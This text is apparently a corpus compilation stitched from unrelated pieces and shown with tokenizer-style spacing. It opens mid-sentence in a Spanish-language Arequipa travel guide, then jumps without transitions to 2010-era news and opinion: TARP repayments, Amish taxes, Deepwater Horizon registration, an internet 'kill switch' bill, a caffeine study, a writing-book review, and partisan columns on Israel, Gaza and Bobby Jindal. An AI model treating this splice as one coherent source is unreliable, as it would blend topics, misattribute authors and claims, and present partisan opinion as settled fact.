Es como una ciudadela de 20 mil metros cuadrados y sirve para las monjas del lugar , el material usado para ser construido es histórico y se trata de mantener tal cual fue acabo de construir en 1579 , aquí se puede encontrar claustros y jardines muy gustosos para la vista .
5.- Cañón del Colca
Con una altitud de 3191 metros sobre el nivel del mar el paisaje del Colca es un lugar para los turistas intrépidos ya que su caminata puede ser algo arriesgada , en este sitio se puede apreciar cóndores de gran tamaño volando en su hábitat y restos arqueólogicos acompañados de la flora muy agradable para los visitantes .
6.- Volcán Misti
Es visible desde la ciudad arequipe ña se considera un volcán activo llega a tener una altitud de 5825 msnm al escalarlo podemos observar la ciudad otros volcanes como el Chachani y Pichu Pichu , sin duda los volcanes del departamento son un atractivo muy reconocido .
7.- Mirador de Yanahuara
Este fue construido en el siglo XIX constando de varios arcos realizados en sillar de los cuales podemos observar la ciudad , en cada arco podemos encontrar inscripciones que son parte de la historia del departamento y el país .
8. - Otros atractivos turísticos :
Sabandía .
Barrio San Lázaro .
Reserva Nacional Salinas y Aguada Blanca .
Casa del Moral .
Mansión del Fundador .
Casa Goyeneche .
Iglesia y museo de Santo Domingo .
Comida típica
1.- Rocoto relleno
Sin duda uno de los platos más reconocidos en todo el país tal como su mismo nombre dice consta de rocotos rellenos con carne , leche , papa , queso y otros ingredientes típicos de la región .
2.- Chupe de camarones
Es un caldo en donde el huevo , leche y orégano son unos de los ingredientes indispensables para su preparación .
Viene siendo uno de los platos mas pedidos por los visitantes y lugareños .
3.- Ocopa
Muy reconocido en todo el país especialmente como salsa para papa , en este se usa principalmente huacatay , ají amarillo y mirasol , aceitunas , leche , huevo , queso , ajo , galletas , pan y diferentes condimentos al gusto .
4.- Adobo
Por lo general el principal ingrediente es la carne de cerdo la que viene acompañada con arroz blanco y papas .
También se usa ají , ajo , cebolla roja , cilantro y comino .
5.- Cuy chactado
En todo el Perú es consumida la carne de cuy siendo muy valorada por su valor nutricional , este tipo de preparación muy típica por todo el sur del país .
Por lo general se fríe los cuyes que sean necesarios y son servidos junto a papa , algunos vegetales como la lechuga o maíz .
6.- Otras comidas típicas :
Buñuelos .
Locro de papa .
Mazamorra de airampo .
Pastel de papa .
Solterito arequipeño .
Provincias
The Treasury Department on Friday hailed what it called a milestone in the history of the controversial $ 700 - billion bailout fund :
For the first time , the amount repaid by banks and other recipients has surpassed the outstanding balance .
In the latest monthly report to Congress on the Troubled Asset Relief Program , or TARP , Treasury officials said repayments had reached $ 194 billion .
That figure tops the $ 190 billion in bailout money still outstanding .
The fund received a big boost in May when the Treasury Department completed its sale of 1.5 billion shares of Citigroup stock it acquired in that bank ’s bailout — a sale that pulled in $ 6.18 billion .
“ TARP repayments have continued to exceed expectations , substantially reducing the projected cost of this program to taxpayers , ” said Herbert M. Allison , Treasury ’s assistant secretary for financial stability .
“ This milestone is further evidence that TARP is achieving its intended objectives : stabilizing our financial system and laying the groundwork for economic recovery . ”
Advertisement
TARP was created by Congress at the height of the financial crisis in 2008 .
It was designed to purchase toxic subprime mortgage securities from banks , but then - Treasury Secretary Henry M. Paulson quickly changed its main purpose and began funneling money into banks to stabilize their financial condition and give them capital to make loans .
In all , 707 banks in the U.S. received $ 205 billion in 2008 and 2009 .
An additional $ 331 billion was committed to other programs , including bailouts of General Motors Co. and Chrysler Group , as well as expanded rescues of Citigroup Inc. and Bank of America Corp .
As the financial crisis eased and the economy has recovered , banks have scrambled to repay the money to avoid tough executive compensation restrictions .
As of the end of May , 71 banks had repaid all of their TARP money and $ 137 billion had been returned .
The Treasury Department has projected that the total bank investments by TARP will earn a profit because of additional income from dividends , interest and the sale of stock warrants the government received .
Advertisement
The repayments and other income have helped dramatically reduce the projected TARP losses .
In August , the Obama administration estimated losses of $ 341 billion .
That figure was reduced last month to $ 105.4 billion .
No additional TARP money can be spent after October , when the fund expires .
Although the administration has been increasingly optimistic about the eventual losses from the TARP fund , the panel set up by Congress to oversee it has been critical of the continued taxpayer exposure .
On Thursday , the Congressional Oversight Panel said taxpayers still “ remain at risk for severe losses ” from the bailout of insurance giant American International Group Inc .
Much of the $ 182 billion committed to AIG comes from the Federal Reserve , but Treasury committed $ 70 billion of TARP money to save the company from bankruptcy .
As of May 31 , AIG had received $ 48 billion of that money .
Advertisement
Some TARP money will never be repaid .
For example , the administration has committed $ 50 billion to provide cash incentives to banks to modify mortgages of homeowners in danger of foreclosure .
To recover any TARP losses , President Obama has proposed a tax on the 50 largest U.S. financial institutions that would bring in about $ 9 billion a year over 10 years .
Congress is considering the proposal , which is strongly opposed by large banks .
“ The repayments of TARP increase every day , thereby lessening the need for any tax , ” said Scott Talbott , chief lobbyist for the Financial Services Roundtable , an organization of large financial institutions .
jim.puzzanghera@latimes.com
When pondering the ins-and - outs of the religious denomination most famous for refusing modern convenience , a question arises : how far does this predilection for simple living go ?
Does it extend to a denouncement of the most basic federal participation program ?
Everybody has that moment when they realize they do n’t know about something that they should probably know about .
Whether it ’s history , language , science , or cultural phenomena , you ’ve felt the stinging personal embarrassment of a moment wherein you realize there ’s some common knowledge that is n’t so common .
Do n’t feel bad ; nobody knows everything .
Nobody , that is , except me and my sidekick , The Internet !
Somewhere in the world , a confused soul begs the question …
Do Amish People Pay Taxes ?
When pondering the fascinating ins-and - outs of the religious denomination most famous for refusing modern convenience , a common question arises : just how far does this predilection for simple living go ?
Does it extend to a denouncement of the most basic federal participation program ?
Do Amish people pay taxes ?
As much as they would like to believe that they are exempt from one of life ’s certainties , Amish are required to pay property , income , and sales tax just like the rest of us .
However , the myth that they could get out of it is not too outlandish and is actually rooted in a bit of reasonability : Amish people do not collect Social Security , unemployment , or welfare benefits .
They do not collect Social Security due to the fact that , because so many Amish are self - employed , a majority of the people in their communities do not pay Social Security tax to begin with .
This resistance actually extends back to 1955 when the Social Security Act was expanded to include farm operators : though many Amish complied with the new guidelines , plenty of others objected to the principal on various grounds ( some claimed it violated the separation of church and state and others did not want to support a program that essentially questioned the people ’s trust in God to take care of them in the later years of their life ) .
Fun fact : there is a clause in the 1965 Medicare Bill that exempts “ Old Order Amish ” ( groups or sects established prior to 1950 ) who conscientiously object to paying insurance premiums for others .
Now you know .
Goofs
Most errors in continuity and acting are purposeful and are part of the gag in recreating the '50s B movie experience .
For example during the cabin sequence , Dr. Fleming 's jacket disappears between shots immediately after Ranger Brad arrives , Animala suddenly sprouting furry gloves without explanation during the last half of her appearance in the film , the visible wires on the Skeleton , and the shoes of the actor portraying the mutant during some of the walking scenes .
See more
Nigel is the managing editor of the Red Ferret , as well as a freelance columnist for the Sunday Times newspaper in London .
Loves tech and fancies himself as a bit of a futurist , but then do n’t we all ?
Nigel – who has written 6621 posts on The Red Ferret Journal .
And there is much to admire and treasure in this .
No decent human being who has a grasp of history , let alone the enormity of the Shoah , can fail to have a deep sympathy for the Jewish people , Israel , and respect for its enormous achievements .
But the fanaticism and emotionalism that many Jewish Americans have with respect to Israel is so intense that , for some , it overwhelms rationality , and makes a cool strategic analysis of America 's national interest close to impossible .
Their total identification with Israel is often emotionally as strong , if not stronger , as their identification with America .
And this tragically means that an honest disagreement with Israel 's policies is sometimes taken as a breach of friendship , a profound personal betrayal , rather than a moral and political judgment about the actions of a foreign country .
It means that the head of the Mossad can be more rational in his assessment of US national interest than Joe Biden .
You reach a brick wall in this .
And we might as well admit it .
It has pained me enormously to have obviously hurt my countless Jewish friends and colleagues because I cannot support , morally or strategically , the actions of Israel these past two years , and especially its virulent disdain for the new American president who represented , it seems to me , the best chance for Israel in decades .
I realize that the difference is that while I admire and support Israel , I do not identify with it .
For me , it is a foreign country and an ally .
To them it is something far more profound and indelible .
So when I attack Israel 's policies , it feels as if I am attacking them .
I really am not .
But I cannot erase how they feel ; and I understand why they feel it .
Tribalism , of course , is universal .
It is by no means the exclusive property of Jewish Americans .
Irish - Americans retain a similar knee - jerk alliance with entities that plenty of people in Ireland find repugnant - just as Israelis are far more candid in their debates than Americans are .
Trust me , in my own family , I know the nature of this kind of identification and the righteousness of it in many instances .
Many Muslim Americans are as knee - jerk - often more so - about the Middle East as Jewish Americans .
But this crisis is , as Peter Beinart has noted , a crisis among American Jews as much as anything , and the inability of some , especially in the older generation , to move even a millimeter away from orthodoxies and rigidities that are becoming almost comically anachronistic , is becoming a form of tragedy .
I think , by the way , that this is the reason some jump so quickly onto the anti-Semitism charge , even when they know that many critics of Israel 's policies are not bigots .
They simply cannot absorb the idea that people they like and even love believe that Israel is doing wrong , horrible , categorical wrong , and that this is undeniable .
And so they cannot explain the criticism , except as a form of self - hatred or animus .
This is n't universal among American Jews , of course , and is mercifully declining in the younger generation .
But it is far more common than we might want to admit .
It has already deeply hurt American interests and Israeli security .
And since it appears it will not really relent for a while yet , who knows what further damage it can do , unless we open up a more honest conversation about it ?
( Photo : a pro-Israel demonstration in New York City , by Mario Tama / Getty . )
We want to hear what you think about this article .
Submit a letter to the editor or write to letters@theatlantic.com .
You know how Louisiana Governor Bobby Jindal likes to blame the Federal government for the damage caused by BP 's oil spill , arguing that he could have kept all the oil at bay if President Obama had only given him the resources he needed to fight it ?
Well , last night CBS News tore Jindal 's argument to shreds , pointing out that while President Obama has authorized up to 6,000 National Guard troops to fight the spill , Jindal has only activated 1,053 of them -- leaving more than 80 % sitting idle , doing nothing to protect the state .
It 's must - see - tv ( text version here ) :
When CBS confronted Jindal about leaving so many guardsmen idle while oil is washing ashore , Jindal -- naturally -- blamed the Federal government , saying that he had requested deployment for the full 6,000 , but that his request had been denied because " the Coast Guard and BP had to authorize individual tasks . "
It turns out Jindal 's response was a lie .
But Coast Guard Adm .
Thad Allen , the national incident commander in charge of the government 's response to the spill , said Jindal is just flat wrong .
" There is nothing standing in the governor 's way from utilizing more National Guard troops , " Allen said .
In fact , the Coast Guard says every request to use the National Guard has been approved , usually within a day .
Now Jindal 's office acknowledged to CBS News the governor has not specifically asked for more Guard troops to be deployed .
This is a very big deal .
It exposes the fact that Jindal has been playing politics with the spill from day one .
He 's argued that the federal government has denied him the resources he needs to fight the spill , but even though he's had thousands of National Guardsmen at his disposal , he 's only used a tiny fraction of them , allowing more than 80 % of the resources at his disposal to go unused .
In light of Jindal 's massive under utilization of National Guard resources , it 's clear that his attacks on the Obama administration were motivated first and foremost by politics .
More than anything else , Jindal wanted to take the heat off the oil industry and put it on the government .
Well , Bobby , mission accomplished .
Too bad you did n't give a damn about stopping the oil .
Obama to be given the right to shut down the internet with ' kill switch '
Barack Obama will be given a ' kill switch ' in times of national emergency
President Obama will be given the power to shut down the Internet with a ' kill switch ' in a new law being proposed in the US .
He would be able to order popular search engines such a Google and Yahoo to suspend access to their websites in times of national emergency .
Other US based Internet service providers as well as broadband providers would also come under his control in times of a ' cybersecurity emergency . '
Any company that failed to comply would be subject to huge fines .
Critics of the new law , which has been proposed by former presidential candidate Joe Liebermann , said it would be an abuse of power to let the White House control the internet .
TechAmerica , one of the largest U.S. technology lobby groups , said the new law had the ' potential for absolute power .'.
The proposed legislation , introduced into the US Senate by Lieberman who is chairman of the US Homeland Security committee , seeks to grant the President broad emergency powers over the internet in times of national emergency .
A sustained terror attack on multiple cities would be considered a national emergency as would a cyber attack by ' hackers ' on the US financial system .
The director of National Intelligence Dennis Blair warned earlier this year that the US is ' severely threatened ' by malicious cyber attacks .
The number of attacks on Government departments has increased by 400 per cent in the last three years .
Under the proposed bill , which has been dubbed an Internet ' kill switch ' , the US Government would effectively seize control of access to the internet .
Lieberman argued the bill was necessary to ' preserve those networks and assets and our country and protect our people ' .
He said : ' For all of its ' user - friendly ' allure , the Internet can also be a dangerous place with electronic pipelines that run directly into everything from our personal bank accounts to key infrastructure to government and industrial secrets .
Traders work on the New York Stock Exchange floor .
US senators fear a cyber- attack on the US could paralyse the nation
' Our economic security , national security and public safety are now all at risk from new kinds of enemies -- cyber - warriors , cyber-spies , cyber- terrorists and cyber-criminals . '
His bill is formally titled the Protecting Cyberspace as a National Asset Act , or PCNAA .
While the US Government would not be able to control the internet in other countries access to the most popular sites would be cut off .
Google , Yahoo and YouTube , the top three most visited sites , are all based in the US .
Google logs an estimated two billion hits a day from 300 million users .
Under the cyber law any company on a list created by Homeland Security that also ' relies on ' the Internet , the telephone system , or any other component of the U.S. ' information infrastructure ' would be subject to command by a new National Centre for Cybersecurity and Communications ( NCCC ) that would be created inside Homeland Security .
Google , the world 's most popular search engine , refused to comment .
A spokesman said the law was not yet Government policy .
I want to become a better writer .
So when I saw Jason Fried , CEO of 37signals , tweeting last month that Richard A. Lanham ’s book Revising Prose was “ the best book on writing & editing I ’ve ever read ” , I had to get myself a copy .
I was not disappointed .
In Revising Prose , Lanham attacks what he terms The Official Style – the lazy , bureaucratic style of writing where nouns dominate and the only verbs to be found are forms of the verb “ to be ” followed by a litany of prepositional phrases .
He introduces a technique he calls the Paramedic Method as a way to put Official Style sentences into action .
It consists of eight steps :
Circle the prepositions .
Circle the “ is ” forms .
Find the action .
Put this action in a simple ( not compound ) active verb .
Start fast – no slow windups .
Read the passage aloud with emphasis and feeling .
Write out each sentence on a blank screen or sheet of paper and mark off its basic rhythmic units with a “ /. ”
Mark off sentence length with a “ /. ”
He measures his success in reducing unnecessary words using a metric he calls a Lard Factor , which is the number of words removed divided by the original sentence length .
For example , in the first chapter , he applies the first five steps of the Paramedic Method to the sentence :
In response to the issue of equality for educational and occupational mobility , it is my belief that a system of inequality exists in the school system .
Highlighting the prepositions and “ is ” forms results in :
In response
to the issue
of equality
for educational and occupational mobility , it is my belief that a system of inequality exists
in the school system .
Lanham identifies that the action , buried under all the prepositions and “ is ” forms , is “ believe ” , so he revises the sentence as follows :
I believe that gender inequality exists in the schools .
This took the sentence from 26 words down to 9 words , a Lard Factor of 65 % .
Revising my own writing
I decided to apply Lanham ’s techniques to my own writing .
First , I found a sentence from my db2top Gauges blog post that is littered with prepositional phrases :
The size of the sequence of ‘ u’ characters is the amount of user CPU time measured in the last interval divided by the average amount of user CPU time + system CPU time measured since the last snapshot reset or database activation .
Highlighting the prepositions and “ is ” forms results in :
The size
of the sequence
of ‘u ’ characters
is the amount
of user CPU time measured
in the last interval divided
by the average amount
of user CPU time + system CPU time measured
since the last snapshot reset or database activation .
Here is my attempt to rewrite it :
When you reset the snapshot monitor or activate your database , db2top starts computing a CPU time average .
It divides recent user CPU time by this average and repeats the letter ‘ u’ proportionally .
That takes me down from 42 to 32 words .
I admit it could use some work .
The book itself
The book is an easy read at just 145 pages plus 18 pages of exercises at the end .
The many , often hilarious examples of bad writing keep things light and fun .
In many ways , Revising Prose reminds me of Martin Fowler ’s book Refactoring , had it been a book about writing instead of computer programming .
The techniques for systematically identifying bad writing bring to mind the concept of code smells and I cannot help but see the similarities to refactoring in the method of revising whole documents by making small , reversible changes to individual sentences .
Perhaps someday writers will have their own automated refactoring tools .
The Deepwater Horizon oil rig that exploded in the Gulf of Mexico was built in South Korea .
It was operated by a Swiss company under contract to a British oil firm .
Primary responsibility for safety and other inspections rested not with the U.S. government but with the Republic of the Marshall Islands — a tiny , impoverished nation in the Pacific Ocean .
And the Marshall Islands , a maze of tiny atolls , many smaller than the ill - fated oil rig , outsourced many of its responsibilities to private companies .
Now , as the government tries to figure out what went wrong in the worst environmental catastrophe in U.S. history , this international patchwork of divided authority and sometimes conflicting priorities is emerging as a crucial underlying factor in the explosion of the rig .
Under International law , offshore oil rigs like the Deepwater Horizon are treated as ships , and companies are allowed to “ register ” them in unlikely places such as the Marshall Islands , Panama and Liberia — reducing the U.S. government ’s role in inspecting and enforcing safety and other standards .
“ Today , these oil rigs can operate under different , very minimal standards of inspection established by international maritime treaties , ” said Rep. James L. Oberstar ( D - Minn. ) , chairman of the House Transportation Committee .
Some offshore drilling experts , as well as some survivors of the explosion that led to the massive spill , say foreign registration also permitted a confusing command structure and understaffing — factors that may have contributed to the disaster .
Senior members of Congress — including Oberstar and House Natural Resources Committee Chairman Nick J. Rahall II ( D - W.Va . ) — have begun looking into the inspection and staffing issues .
The House Subcommittee on Coast Guard and Maritime Transportation will hold a hearing Thursday on foreign - flagged rigs in the Gulf of Mexico .
Different types of rigs are classified differently , and the Marshall Islands assigned the Deepwater Horizon to a category that permitted lower staffing levels .
“ Over the years , the manning dwindled down and down , ” said Douglas Harold Brown , chief mechanic aboard the Deepwater Horizon , who had been assigned to the floating drilling rig since shortly after it was manufactured in 2000 .
“ I believe that safety was compromised by this , ” he said in an interview .
Brown ’s lawyer and others say the Marshall Islands licensed the Deepwater Horizon in a way that allowed rig operator Transocean Ltd. to place an oil drilling expert — the so - called offshore installation manager — ahead of a licensed sea captain in making decisions on the day of the explosion .
The dual command structure created confusion that delayed an effective response to the growing crisis aboard the Deepwater Horizon , he and others allege .
Officials at Transocean and the Marshall Islands reject the claims .
They say they fulfilled all requirements of the law and met the highest industry standards , and those of the Coast Guard .
Brian Kennedy , a spokesman for Transocean , called the complaints “ egregiously unfounded and inflammatory . ”
The disorganization reported by crew members who survived the Deepwater Horizon explosion was the result of a tragic and unexpected disaster , not deficiencies in manning or safety standards on the part of Transocean , Kennedy said .
“ At the end of the day , I think the fact that 115 people got off the rig that night will be viewed as a testament to the training , skill and heroic acts of dozens of crew members , ” he said .
The Marshall Islands deputy maritime minister , Thomas Heinan , said the manning requirements aboard the Deepwater Horizon were “ equal to those of the U.S. and in accordance with international standards . ”
A deepwater oil rig floats above the well , connected by thousands of feet of pipe , and is kept in position by thrusters and elaborate navigational systems .
Since World War II , thousands of ships and rigs from the U.S. and other industrialized countries have been registered in less - developed nations like the Marshall Islands .
Some members of Congress are expressing concern about the Marshall Islands and other countries that outsource their inspection responsibilities to private companies .
Coast Guard officials confirm that more rigorous inspection procedures apply to the relatively small number of rigs registered in the U.S .
A foreign vessel will be reviewed by the Coast Guard , but the inspection is relatively cursory , relying on inspection reports prepared by outside firms that have been paid directly by the owners of the vessel .
The federal Minerals Management Service , which also has a role in overseeing offshore oil operations , deals only with issues “ below the waterline ” of the floating rig .
It was not responsible for rig staffing , command structure or other above - water operations .
John Konrad , a licensed captain who publishes a maritime blog and is consulting with survivors , said oil rigs should be under the command of licensed sea captains .
“ On the Deepwater Horizon you had the guy who does the drilling plans able to make the call on safety , ” Konrad said .
Such dual command structures would not be accepted for U.S. - flagged operations , experts say .
The Deepwater Horizon captain testified to investigators last month that he conferred with the drilling manager before he attempted to disconnect the rig .
By the time a crew member decided on his own to push the emergency disconnect , it was too late .
Kennedy , the spokesman for Transocean , said , “ Having two complementary positions that reflect the dual functionality of the rig , as the Horizon did , provides a clear but collaborative chain of command that has been employed by the industry for decades . ”
But Steven Gordon , a maritime lawyer in Houston representing Brown , six other survivors and the family of one of the 11 workers killed in the blast , said , “ This course of action cost men their lives . ”
“ It led to a jumble of disorganization on the Deepwater Horizon at the moment when organization was needed the most , ” he said .
tom.hamburger@latimes.com
kim.geiger@latimes.com
Jon Stewart On The Never - Ending Quest For “ Energy Independence ”
Doug Mataconis · · 6 comments
Last night Jon Stewart did an amusing , and spot -on , piece about the history of Presidential promises of “ energy independence : ”
It ’s completely true , of course .
You could substitute Nixon ’s rhetoric about foreign oil in 1974 for Obama ’s on Tuesday night , or vice versa , and the message would essentially be the same .
If history is any guide , this latest quest for freedom from fossil fuels is likely to end exactly the same way all the others did .
Just in : new data on our staggering income gap .
Just emerging : a better understanding why such gaps make economic calamities inevitable .
By Sam Pizzigati
Years ago , in the mid 20th century , no one in the United States spent much time talking about rising income inequality , for the simple reason that inequality was n’t rising .
But that all began to change in the 1970s , and , by the mid 1980s , independent economists were sounding a rising income inequality alarm .
Conservative analysts , almost ever since , have been advising us to pay that alarm no attention .
Anyone who takes the time to take into account all the government benefits that poorer households receive , these analysts have argued , would see we have no inequality problem worth worrying about .
Researchers at the Congressional Budget Office , over recent years , have actually been doing exactly what apologists for our unequal economic order have advised .
In their ongoing income calculations , these researchers have been taking government benefits into account , everything from Medicaid to food stamps .
The CBO researchers , to understand how much income U.S. households have at their disposal , have also been factoring into their data a variety of other income intake and outgo streams — the value of employer - provided health insurance , for instance , and the dollars households pay in federal taxes .
The CBO researchers now have comprehensive annual income data sets that go back to 1979 .
Last month , they updated their data with figures from 2007 .
The main take - away from the new numbers :
We most definitely do have an inequality problem worth worrying about .
Since 1979 , the latest CBO stats show , America ’s most affluent 1 percent of households have more than doubled their share of the nation ’s after - tax income , to 17.1 percent .
The actual average after - tax incomes of the top 1 percent have , over that same span , nearly quadrupled after taking inflation into account , from $ 346,600 in 1979 to $ 1,319,700 in 2007 .
The new CBO ’s data most remarkable contrast of all :
In 1979 , America ’s statistical middle class — that is , the 20 percent of households in the exact middle of the nation ’s income distribution — took home well over twice as much income , after taxes , as the households in the top 1 percent .
In 2007 , our top 1 percent took home after taxes , as a new Center on Budget and Policy Priorities analysis notes , more than the entire statistical middle class .
IRS stats , as crunched by economist Emmanuel Saez , let us track the U.S. income distribution picture back even further in time , to the World War I era .
These numbers put the new CBO stats in an even more striking perspective .
In 2007 , the data indicate , America ’s top 1 percent took in their highest share of the nation ’s income since 1928 , the year before the epic 1929 Wall Street crash sent the nation spinning into Great Depression .
The year after 2007 , we might want to keep in mind , saw a Wall Street crash that sent the nation spinning into Great Recession .
Notice any pattern here ?
In 1928 , we have a ridiculously high concentration of wealth at the nation ’s economic summit .
One year later , economic meltdown .
In 2007 , another ridiculously high concentration of wealth .
One year later , another meltdown .
Coincidence ?
Or direct cause and effect ?
Or , to put the matter more broadly , does intense income inequality trigger economic calamity ?
High - profile economists and journalists are starting to ask that question .
Last week brought intriguing attempts at an answer from Nobel Prize - winning economist Paul Krugman and the Washington Post economic analyst Ezra Klein .
Krugman began his discussion by acknowledging that , before 2008 , he saw no “ clear reason why high inequality should lead to macroeconomic crisis . ”
Now he sees plenty of potential links .
One might be political .
The same political tilt to the right that ends up slashing taxes on the rich — and concentrating income at the top — also minimizes government regulation of the financial sector and ends up leaving economies vulnerable to sudden breakdowns .
But the link may also be more classically economic .
In an increasingly unequal society , with more and more wealth amassing in the pockets of a precious few rich , average consumers simply do n’t have the means to make the purchases that can keep an economy humming .
Economic collapse becomes inevitable .
Other economists , notes Krugman , see inequality ’s reflection less in this underconsumption and more in overconsumption .
Their argument :
In an increasingly unequal society , the rich spend more because they have more .
This rising spending by the rich raises a society ’s consumption bar .
With this bar rising , middle class families feel themselves under pressure to spend more , too — or else come across as unsuccessful .
To do that spending , these average families find themselves saving less and borrowing more .
A credit bubble builds and eventually pops .
Crisis ensues .
The Washington Post ’s Ezra Klein adds still another causal agent into the mix .
In a deeply unequal society , he notes , rich people certainly do spend more .
But even after spending more , they still have huge piles of cash that need investing .
And the more piles out there , Klein adds , the higher the demand for high - yield investment vehicles — and the higher the potential rewards “ for people who can invent new investment vehicles with high yields . ”
The result ?
Amid severe income inequality , says Klein , societies get “ explosive innovations in weird financial instruments that look good for a while because the risk is underpriced but end up making the system more fragile when their risks come clear and everyone flees . ”
So how , in the end , does inequality send economies crashing ?
Take your pick from these varied explanations .
Or take them all .
They all drive home the same basic message .
We play with fire when we let income concentrate .
Eventually , people who live in staggeringly unequal societies will always get burned .
Sam Pizzigati edits Too Much , the online newsletter on excess and inequality published by the Washington , D.C. - based Institute for Policy Studies .
Too Much appears weekly .
Read the current issue or sign up to receive Too Much in your email inbox .
In June 1948 , our wartime ally imposed a blockade on Berlin , cutting off and condemning to death or Stalinist domination 2 million Germans , most of whom , not long before , had cheered Adolf Hitler .
Harry Truman responded with the Berlin airlift , in perhaps the most magnanimous act of the Cold War .
For nine months , U.S. pilots flew into Tempelhof , carrying everything from candy to coal , saving a city and earning the eternal gratitude of the people of Berlin , and admiration everywhere that moral courage is admired .
That was an America that lived its values .
And today , President Obama should end his and his country ’s shameful silence over the inhumane blockade of Gaza that is denying 1.5 million beleaguered people the basic necessities of a decent life .
Time to start acting like America again .
That bloody debacle in the Eastern Mediterranean last Sunday was an inevitable result of Israel doing what it always seems to do : going beyond what is essential to her security , to impose collective punishment upon any and all it regards as hostile to Israel .
Israel claims , and film confirms , that its commandos rappelling down onto the Turkish ship were attacked with sticks and metal rods .
One was tossed off a deck , another tossed overboard into a lifeboat .
But that 2 a.m. boarding of an unarmed ship with an unarmed crew , carrying no munitions or weapons , 65 miles at sea , was an act of piracy .
What the Israeli commandos got is what any armed hijacker should expect who tries to steal a car from a driver who keeps a tire iron under the front seat .
And the response of these highly trained naval commandos to the resistance they encountered ?
They shot and killed nine passengers , and wounded many more .
But we have a blockade of Gaza , say the Israelis , and this flotilla was a provocation .
Indeed , it was .
And Selma was a provocation .
The marchers at Edmund Pettus Bridge were disobeying orders of the governor of Alabama and state police not to march .
Yet , today , liberal Democrats who regard Martin Luther King as a moral hero for championing nonviolent civil disobedience to protest injustice are cheering not the unarmed passengers trying to break the Gaza blockade , but the Israelis enforcing the blockade .
Where were these fellows when “ Bull ” Connor really needed them ?
Comes the retort : Israel is a friend and ally , and we stand with our friends .
But is not Turkey a friend and ally of 50 years , whose soldiers died alongside ours in Korea and who accepted Jupiter missiles targeted on Russia , even before the Cuban missile crisis ?
Was it not Turkey whose citizens were wounded and killed in the bloody debacle ?
Why are we not at least even - handed between our friends ?
On the trip to Israel where he was blindsided by news that Israel would build 1,600 new housing units in East Jerusalem , Joe Biden told Shimon Peres , “ There is absolutely no space between the United States and Israel when it comes to Israel ’s security . ”
And that is the problem .
America is a superpower with interests in an Arab world of 300 million and an Islamic world of 1.5 billion — interests Israel treats with indifference if not contempt when it comes to doing what she regards as necessary for her security .
While Israel had a right to build a wall to protect her people from terror attack , did she have a right to build it on Palestinian land ?
While Israel had a right to go after Hezbollah when her soldiers were shot on the border and several kidnapped , did Israel have a right to conduct a five - week bombing campaign that smashed Lebanon , killing hundreds of civilians and creating upward of a million refugees ?
While Israel had a right to go into Gaza to stop the firing of crude rockets on Sderot , did she have a right to smash utilities and public buildings and kill 1,400 people , most of them civilians ?
Is whatever Israel decides to do in the name of her security fine with us , because there is “ absolutely no space ” between our interests and hers , our values and Israel ’s values ?
Even with Winston Churchill ’s Britain , there was “ space ” between us on strategic goals and national policies .
Israel has a right to secure Gaza to deny Hamas access to weapons , especially rockets that could reach Israel .
But that does not justify denying 1.5 million people what they need to live in decency .
According to The Washington Post , “ 80 percent of the population ( of Gaza ) depends on charity .
Hospitals , schools , electricity systems and sewage treatment facilities are all in deep disrepair . ”
With our silence , we support this .
And we wonder why they hate us .
Obama should tell the Israelis that Joe got it wrong .
There is space between us .
The Gaza siege must end .
And America will herself be sending aid , but will also support Israel ’s right to inspect trucks and ships to see to it no weapons get through to Gaza .
Let ’s start behaving like who we once were .
The Best of Patrick J. Buchanan
By Jenifer Goodwin
HealthDay Reporter
WEDNESDAY , June 2 ( HealthDay News ) --
If you shudder at the thought of having to start the day without a cup of coffee , new research hints at why you may feel this way .
Regular coffee drinkers seem to need caffeine to return to their normal state of alertness and to avoid the side effects of caffeine withdrawal such as headaches .
That runs counter to popular belief that drinking caffeinated beverages offers some added boost in alertness , the researchers said .
" Although caffeine consumers feel alerted by caffeine , the effect is actually only bringing you back from caffeine withdrawal - induced , low - level alertness , " said study author Peter Rogers , a professor in the department of experimental psychology at the University of Bristol in England .
" You are not gaining anything over and above a non-consumer of caffeine . "
The study is published online June 2 in the journal Neuropsychopharmacology .
Caffeine , sometimes called the most commonly used drug in the world , acts on the central nervous system 's receptors for the neurotransmitter adenosine , according to background information in the study .
Adenosine is involved in regulating blood pressure , as well as sleepiness and wakefulness , alertness and anxiety responses , Rogers said .
In the study , researchers asked 379 participants to abstain from drinking caffeinated beverages for 16 hours .
They then gave half of the participants 100 milligrams of caffeine ( the equivalent of one to two cups of coffee ) , and another 150 milligrams of caffeine an hour and a half later .
The other half were given a placebo .
Participants were also asked about their normal consumption of caffeinated beverages .
Light caffeine consumers were those who drank less than 40 milligrams a day , or less than the amount of caffeine found in one cup of coffee .
A cup of instant coffee has about 54 milligrams of caffeine , according to the study , though the precise amounts are dependent on brand and brewing method , among other factors , Rogers said .
While both light caffeine drinkers and heavier caffeine drinkers reported feeling more alert after being given caffeine , there were marked differences in their responses to the placebo .
Those who normally drank few caffeinated beverages did n't notice much of a difference in their level of alertness when given a placebo versus caffeine .
Heavier caffeine drinkers given the placebo , however , reported a sharp drop - off in feelings of alertness .
In addition , heavier caffeine consumers given placebo were also much more likely to report having a headache .
" What this study does is provide very strong evidence for the idea that we do n't gain a benefit in alertness from consuming caffeine , " Rogers said .
" Although we feel alert , that 's just caffeine bringing us back to our normal state of alertness . "
Furthermore , abstaining from caffeine when you 're used to having it can cause a " caffeine hangover , " Rogers said .
" The nice thing about a caffeine hangover is you can get rid of it quickly by drinking coffee , " Rogers noted .
Researchers also looked at caffeine - induced anxiety , a common side effect that 's more pronounced in people with a specific variant of the ADORA2A gene , previous research has shown .
In this study , about 20 percent of participants had the ADORA2A variant , Rogers said ; other research has put the number of people with the variant as high as one - third .
Researchers found people with the anxiety - producing variant were no less likely to consume coffee than those without the variant and in fact , tended to drink a bit more coffee suggesting that the " anxiety buzz " caused by caffeine is n't necessarily unpleasant , Rogers said .
" They do n't seem to particularly mind it , in fact , they might like that anxiety buzz , " Rogers said .
Participants who typically consumed caffeinated beverages also seemed to develop a tolerance to its anxiety - producing effects .
Among regular caffeine drinkers , there was little difference in feelings of anxiety whether they 'd been given a placebo or the real thing , while light caffeine drinkers reported significantly more anxiety after being given caffeine .
Dr. Peter Martin , a professor of psychiatry and pharmacology at Vanderbilt University , said the study is an interesting look at the biological effects of caffeine .
However , not everyone who drinks lots of caffeinated beverages experiences withdrawal such as headaches when they cut back or quit .
And compared to other " drugs , " the effects of caffeine are mild , and coffee and tea in particular may have other health benefits .
" That is the difference between statistical significance and clinical relevance , " Martin said .
" No one is going to change what they do , and there 's no reason to change .
There is a lot of data to suggest caffeine improves motor performance and memory performance . "
